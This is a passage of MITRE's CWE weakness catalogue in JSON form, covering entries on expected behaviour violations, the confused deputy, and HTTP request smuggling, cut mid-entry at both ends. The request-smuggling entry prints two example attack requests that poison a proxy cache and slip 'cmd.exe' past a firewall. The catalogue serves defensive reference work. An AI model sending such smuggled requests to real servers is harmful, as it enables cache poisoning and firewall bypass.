Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"}],"Previous_Entry_Name":{"#text":"Behavioral Change","attr":{"@_Date":"2008-04-11"}}}},"440":{"attr":{"@_ID":"440","@_Name":"Expected Behavior Violation","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"A feature, API, or function does not perform according to its specification.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"684","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":["Quality Degradation","Varies by Context"]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2003-0187","Description":"Program uses large timeouts on \\"undeserving\\" to compensate for inconsistency of support for linked lists.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0187"},{"Reference":"CVE-2003-0465","Description":"\\"strncpy\\" in Linux kernel acts different than libc on x86, leading to expected behavior difference - sort of a multiple interpretation error?","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0465"},{"Reference":"CVE-2005-3265","Description":"Buffer overflow in product stems the use of a third party library function that is expected to have internal protection against overflows, but doesn\'t.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3265"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Expected behavior violation"}},"Notes":{"Note":{"#text":"The behavior of an application that is not consistent with the expectations of the developer may lead to incorrect use of the software.","attr":{"@_Type":"Theoretical"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes, Relevant_Properties, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Relevant_Properties"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Description, Observed_Examples, Theoretical_Notes"}]}},"441":{"attr":{"@_ID":"441","@_Name":"Unintended Proxy or Intermediary (\'Confused Deputy\')","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product receives a request, message, or directive from an upstream component, but the product does not sufficiently preserve the original source of the request before forwarding the request to an external actor that is outside of the product\'s control sphere. This causes the product to appear to be the source of the request, leading it to act as a proxy or other intermediary between the upstream component and the external actor.","Extended_Description":{"xhtml:p":["If an attacker cannot directly contact a target, but the product has access to the target, then the attacker can send a request to the product and have it be forwarded to the target. The request would appear to be coming from the product\'s system, not the attacker\'s system. As a result, the attacker can bypass access controls (such as firewalls) or hide the source of malicious requests, since the requests would not be coming directly from the attacker.","Since proxy functionality and message-forwarding often serve a legitimate purpose, this issue only becomes a vulnerability when:"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["The product runs with different privileges or on a different system, or otherwise has different levels of access than the upstream component;","The attacker is prevented from making the request directly to the target; and","The attacker can create a request that the proxy does not explicitly intend to be forwarded on the behalf of the requester. Such a request might point to an unexpected hostname, port number, hardware IP, or service. Or, the request might be sent to an allowed service, but the request could contain disallowed directives, commands, or resources."]}}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"610","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"668","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"Confused Deputy","Description":"This weakness is sometimes referred to as the \\"Confused deputy\\" problem, in which an attacker misused the authority of one victim (the \\"confused deputy\\") when targeting another victim."}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":["Non-Repudiation","Access Control"],"Impact":["Gain Privileges or Assume Identity","Hide Activities","Execute Unauthorized Code or Commands"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Enforce the use of strong mutual authentication mechanism between the two parties."},{"Phase":"Architecture and Design","Description":"Whenever a product is an intermediary or proxy for\\n                   transactions between two other components, the proxy core\\n                   should not drop the identity of the initiator of the\\n                   transaction. The immutability of the identity of the\\n                   initiator must be maintained and should be forwarded all the\\n                   way to the target."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"A SoC contains a microcontroller (running ring-3\\n                     (least trusted ring) code), a Memory Mapped Input Output\\n                     (MMIO) mapped IP core (containing design-house secrets),\\n                     and a Direct Memory Access (DMA) controller, among several\\n                     other compute elements and peripherals. The SoC implements\\n                     access control to protect the registers in the IP core\\n                     (which registers store the design-house secrets) from\\n                     malicious, ring-3 (least trusted ring) code executing on\\n                     the microcontroller.  The DMA controller, however, is not\\n                     blocked off from accessing the IP core for functional\\n                     reasons.","Example_Code":[{"#text":"The code in ring-3 (least trusted ring) of the\\n                     microcontroller attempts to directly read the protected\\n                     registers in IP core through MMIO transactions. However,\\n                     this attempt is blocked due to the implemented access\\n                     control. Now, the microcontroller configures the DMA core\\n                     to transfer data from the protected registers to a memory\\n                     region that it has access to. The DMA core, which is\\n                     acting as an intermediary in this transaction, does not\\n                     preserve the identity of the microcontroller and, instead,\\n                     initiates a new transaction with its own identity. Since\\n                     the DMA core has access, the transaction (and hence, the\\n                     attack) is successful.","attr":{"@_Nature":"bad","@_Language":"Other"}},{"#text":"The DMA\\n                     core forwards this transaction with the identity of the\\n                     code executing on the microcontroller, which is the\\n                     original initiator of the end-to-end transaction. Now the\\n                     transaction is blocked, as a result of forwarding the\\n                     identity of the true initiator which lacks the permission\\n                     to access the confidential MMIO mapped IP core.","attr":{"@_Nature":"good","@_Language":"Other"}}],"Body_Text":"The weakness here is that the intermediary or the\\n                     proxy agent did not ensure the immutability of the\\n                     identity of the microcontroller initiating the\\n                     transaction."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-1999-0017","Description":"FTP bounce attack. The design of the protocol allows an attacker to modify the PORT command to cause the FTP server to connect to other machines besides the attacker\'s.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0017"},{"Reference":"CVE-1999-0168","Description":"RPC portmapper could redirect service requests from an attacker to another entity, which thinks the requests came from the portmapper.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0168"},{"Reference":"CVE-2005-0315","Description":"FTP server does not ensure that the IP address in a PORT command is the same as the FTP user\'s session, allowing port scanning by proxy.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0315"},{"Reference":"CVE-2002-1484","Description":"Web server allows attackers to request a URL from another server, including other ports, which allows proxied scanning.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1484"},{"Reference":"CVE-2004-2061","Description":"CGI script accepts and retrieves incoming URLs.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2061"},{"Reference":"CVE-2001-1484","Description":"Bounce attack allows access to TFTP from trusted side.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1484"},{"Reference":"CVE-2010-1637","Description":"Web-based mail program allows internal network scanning using a modified POP3 port number.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1637"},{"Reference":"CVE-2009-0037","Description":"URL-downloading library automatically follows redirects to file:// and scp:// URLs","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0037"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Unintended proxy/intermediary"},{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Proxied Trusted Channel"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":32,"Entry_Name":"Routing Detour"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"141"}},{"attr":{"@_CAPEC_ID":"142"}},{"attr":{"@_CAPEC_ID":"219"}},{"attr":{"@_CAPEC_ID":"465"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-432"}},{"attr":{"@_External_Reference_ID":"REF-1125"}}]},"Notes":{"Note":[{"#text":"This weakness has a chaining relationship with CWE-668 (Exposure of Resource to Wrong Sphere) because the proxy effectively provides the attacker with access to the target\'s resources that the attacker cannot directly obtain.","attr":{"@_Type":"Relationship"}},{"#text":"This could possibly be considered as an emergent resource.","attr":{"@_Type":"Maintenance"}},{"#text":"It could be argued that the \\"confused deputy\\" is a fundamental aspect of most vulnerabilities that require an active attacker. Even for common implementation issues such as buffer overflows, SQL injection, OS command injection, and path traversal, the vulnerable program already has the authorization to run code or access files. The vulnerability arises when the attacker causes the program to run unexpected code or access unexpected files.","attr":{"@_Type":"Theoretical"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Observed_Example, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Maintenance_Notes, Relationships, Taxonomy_Mappings, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, Description, Maintenance_Notes, Name, Observed_Examples, References, Relationship_Notes, Relationships, Theoretical_Notes, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-14","Modification_Comment":"Per Intel Corporation suggestion, added language to be inclusive to hardware: updated Demonstrative_Examples, Description, Extended_Description, Applicable_Platforms, Potential_Mitigation, Common_Consequences, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Potential_Mitigations, References, Relationships"}],"Previous_Entry_Name":{"#text":"Unintended Proxy/Intermediary","attr":{"@_Date":"2013-02-21"}}}},"443":{"attr":{"@_ID":"443","@_Name":"DEPRECATED: HTTP response splitting","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Deprecated"},"Description":"This weakness can be found at CWE-113.","Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-07-19","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Name"}],"Previous_Entry_Name":{"#text":"DEPRECATED (Duplicate): HTTP response splitting","attr":{"@_Date":"2021-07-20"}}}},"444":{"attr":{"@_ID":"444","@_Name":"Inconsistent Interpretation of HTTP Requests (\'HTTP Request Smuggling\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"When malformed or abnormal HTTP requests are interpreted by one or more entities in the data flow between the user and the web server, such as a proxy or firewall, they can be interpreted inconsistently, allowing the attacker to \\"smuggle\\" a request to one device without the other device being aware of it.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"436","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"436","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Web Based","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Non-Repudiation","Access Control"],"Impact":["Unexpected State","Hide Activities","Bypass Protection Mechanism"],"Note":"An attacker could create a request to exploit a number of weaknesses including 1) the request can trick the web server to associate a URL with another URLs webpage and caching the contents of the webpage (web cache poisoning attack), 2) the request can be structured to bypass the firewall protection mechanisms and gain unauthorized access to a web application, and 3) the request can invoke a script or a page that returns client credentials (similar to a Cross Site Scripting attack)."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Use a web server that employs a strict HTTP parsing procedure, such as Apache [REF-433]."},{"Phase":"Implementation","Description":"Use only SSL communication."},{"Phase":"Implementation","Description":"Terminate the client session after each request."},{"Phase":"System Configuration","Description":"Turn all pages to non-cacheable."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"In the following example, a malformed HTTP request is sent to a website that includes a proxy server and a web server with the intent of poisoning the cache to associate one webpage with another malicious webpage.","Example_Code":[{"attr":{"@_Nature":"attack"},"xhtml:div":{"#text":"POST http://www.website.com/foobar.html HTTP/1.1Host: www.website.comConnection: Keep-AliveContent-Type: application/x-www-form-urlencodedContent-Length: 0Content-Length: 44GET /poison.html HTTP/1.1Host: www.website.comBla: GET http://www.website.com/page_to_poison.html HTTP/1.1Host: www.website.comConnection: Keep-Alive","xhtml:br":["","","","","","","","","","",""]}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"protected void processRequest(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...try {} catch (Exception ex) {...}","xhtml:br":["","",""],"xhtml:i":"// Set up response writer object","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"Enumeration contentLengthHeaders = request.getHeaders(\\"Content-Length\\");int count = 0;while (contentLengthHeaders.hasMoreElements()) {}if (count &gt; 1) {}else {}","xhtml:br":["","","","","","",""],"xhtml:i":"// check for multiple content length headers","xhtml:div":[{"#text":"count++;","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"// output error response"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"// process request"}}]}}}}}}],"Body_Text":["When this request is sent to the proxy server, the proxy server parses the POST request in the first seven lines, and encounters the two \\"Content-Length\\" headers. The proxy server ignores the first header, so it assumes the request has a body of length 44 bytes. Therefore, it treats the data in the next three lines that contain exactly 44 bytes as the first request\'s body. The proxy then parses the last three lines which it treats as the client\'s second request.","The request is forwarded by the proxy server to the web server. Unlike the proxy, the web server uses the first \\"Content-Length\\" header and considers that the first POST request has no body, and the second request is the line with the first GET (note that the second GET is parsed by the web server as the value of the \\"Bla\\" header).","The requests the web server sees are \\"POST /foobar.html\\" and \\"GET /poison.html\\", so it sends back two responses with the contents of the \\"foobar.html\\" page and the \\"poison.html\\" page, respectively. The proxy matches these responses to the two requests it thinks were sent by the client \\"POST /foobar.html\\" and \\"GET /page_to_poison.html\\". If the response is cacheable, the proxy caches the contents of \\"poison.html\\" under the URL \\"page_to_poison.html\\", and the cache is poisoned! Any client requesting \\"page_to_poison.html\\" from the proxy would receive the \\"poison.html\\" page.","When a website includes both a proxy server and a web server some protection against this type of attack can be achieved by installing a web application firewall, or use a web server that includes a stricter HTTP parsing procedure or make all webpages non-cacheable.","Additionally, if a web application includes a Java servlet for processing requests, the servlet can check for multiple \\"Content-Length\\" headers and if they are found the servlet can return an error response thereby preventing the poison page to be cached, as shown below."]},{"Intro_Text":"In the following example, a malformed HTTP request is sent to a website that includes a web server with a firewall with the intent of bypassing the web server firewall to smuggle malicious code into the system..","Example_Code":{"attr":{"@_Nature":"attack"},"xhtml:div":{"#text":"POST /page.asp HTTP/1.1Host: www.website.comConnection: Keep-AliveContent-Length: 49223zzz...zzz [\\"z\\" x 49152]POST /page.asp HTTP/1.0Connection: Keep-AliveContent-Length: 30POST /page.asp HTTP/1.0Bla: POST /page.asp?cmd.exe HTTP/1.0Connection: Keep-Alive","xhtml:br":["","","","","","","","","","","",""]}},"Body_Text":["When this request is sent to the web server, the first POST request has a content-length of 49,223 bytes, and the firewall treats the line with 49,152 copies of \\"z\\" and the lines with an additional lines with 71 bytes as its body (49,152+71=49,223). The firewall then continues to parse what it thinks is the second request starting with the line with the third POST request.","Note that there is no CRLF after the \\"Bla: \\" header so the POST in the line is parsed as the value of the \\"Bla:\\" header. Although the line contains the pattern identified with a worm (\\"cmd.exe\\"), it is not blocked, since it is considered part of a header value. Therefore, \\"cmd.exe\\" is smuggled through the firewall.","When the request is passed through the firewall the web server the first request is ignored because the web server does not find an expected \\"Content-Type: application/x-www-form-urlencoded\\" header, and starts parsing the second request.","This second request has a content-length of 30 bytes, which is exactly the length of the next two lines up to the space after the \\"Bla:\\" header. And unlike the firewall, the web server processes the final POST as a separate third request and the \\"cmd.exe\\" worm is smuggled through the firewall to the web server.","To avoid this attack a Web server firewall product must be used that is designed to prevent this type of attack."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-2088","Description":"Web servers allow request smuggling via inconsistent Transfer-Encoding and Content-Length headers.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2088"},{"Reference":"CVE-2005-2089","Description":"Web servers allow request smuggling via inconsistent Transfer-Encoding and Content-Length headers.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2089"},{"Reference":"CVE-2005-2090","Description":"Web servers allow request smuggling via inconsistent Transfer-Encoding and Content-Length headers.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2090"},{"Reference":"CVE-2005-2091","Description":"Web servers allow request smuggling via inconsistent Transfer-Encoding and Content-Length headers.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2091"},{"Reference":"CVE-2005-2092","Description":"Web servers allow request smuggling via inconsistent Transfer-Encoding and Content-Length headers.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2092"},{"Reference":"CVE-2005-2093","Description":"Web servers allow request smuggling via inconsistent Transfer-Encoding and Content-Length headers.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2093"},{"Reference":"CVE-2005-2094","Description":"Web servers allow request smuggling via inconsistent Transfer-Encoding and Content-Length headers.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2094"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"HTTP Request Smuggling"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":26,"Entry_Name":"HTTP Request Smuggling"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"105"}},{"attr":{"@_CAPEC_ID":"33"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-433"}}},"Notes":{"Note":{"#text":"Request smuggling can be performed due to a multiple interpretation error, where the target is an intermediary or monitor, via a consistency manipulation (Transfer-Encoding and Content-Length headers).","attr":{"@_Type":"Theoretical"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Name, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Other_Notes, Potential_Mitigations, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships"}],"Previous_Entry_Name":[{"#text":"HTTP Request Smuggling","attr":{"@_Date":"2008-04-11"}},{"#text":"Interpretation Conflict in Web Traffic (aka \'HTTP Request Smuggling\')","attr":{"@_Date":"2008-09-09"}},{"#text":"Inconsistent Interpretation of HTTP Requests (aka \'HTTP Request Smuggling\')","attr":{"@_Date":"2009-05-27"}}]}},"446":{"attr":{"@_ID":"446","@_Name":"UI Discrepancy for Security Feature","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The user interface does not correctly enable or configure a security feature, but the interface provides feedback that causes the user to believe that the feature is in a secure state.","Extended_Description":"When the user interface does not properly reflect what the user asks of it, then it can lead the user into a false sense of security. For example, the user might check a box to enable a security option to enable encrypted communications, but the software does not actually enable the encryption. Alternately, the user might provide a \\"restrict ALL\'\\" access control rule, but the software only implements \\"restrict SOME\\".","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"684","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context"}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-1999-1446","Description":"UI inconsistency; visited URLs list not cleared when \\"Clear History\\" option is selected.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1446"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"User interface inconsistency"}},"Notes":{"Note":{"#text":"This entry is likely a loose composite that could be broken down into the different types of errors that cause the user interface to have incorrect interactions with the underlying security feature.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Maintenance_Notes, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes, Relationship_Notes, Weakness_Ordinalities"}],"Previous_Entry_Name":[{"#text":"User Interface Discrepancy for Security Feature","attr":{"@_Date":"2008-01-30"}},{"#text":"User Interface Discrepancy for Security Feature","attr":{"@_Date":"2008-04-11"}}]}},"447":{"attr":{"@_ID":"447","@_Name":"Unimplemented or Unsupported Feature in UI","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"A UI function for a security feature appears to be supported and gives feedback to the user that suggests that it is supported, but the underlying functionality is not 